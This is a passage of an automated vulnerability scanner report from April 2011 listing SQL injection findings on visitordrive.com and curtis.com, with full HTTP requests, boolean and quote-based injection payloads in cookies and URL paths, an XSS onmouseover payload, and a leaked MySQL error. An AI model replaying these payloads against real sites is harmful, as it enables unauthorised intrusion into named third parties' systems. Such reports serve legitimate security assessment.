X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]
1.7. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/services/keywords.php

Issue detail

The sdate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sdate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011'&edate=04%2f18%2f2011&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 574
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00'
       AND `cdate` < '2011-04-18 23:59:59'
       AND `pathQuery` != ''' at line 5)<br>
...[SNIP]...

Request 2

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011''&edate=04%2f18%2f2011&_=

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]
1.8. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 53431827%20or%201%3d1--%20 and 53431827%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d1--%20; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:06:36 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d2--%20; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176368;path=/
Set-Cookie: CFTOKEN=71631396;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...
1.9. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 17943346%20or%201%3d1--%20 and 17943346%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=3257569717943346%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:06:43 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=3257569717943346%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176385;path=/
Set-Cookie: CFTOKEN=23633185;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...
1.10. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 59265610'%20or%201%3d1--%20 and 59265610'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm59265610'%20or%201%3d1--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /emaildisclaimer.cfm59265610'%20or%201%3d2--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.11. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 60403110'%20or%201%3d1--%20 and 60403110'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:06:19 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...
1.12. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 21125157'%20or%201%3d1--%20 and 21125157'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:06:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...
1.13. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 14813370%20or%201%3d1--%20 and 14813370%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d1--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:06:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

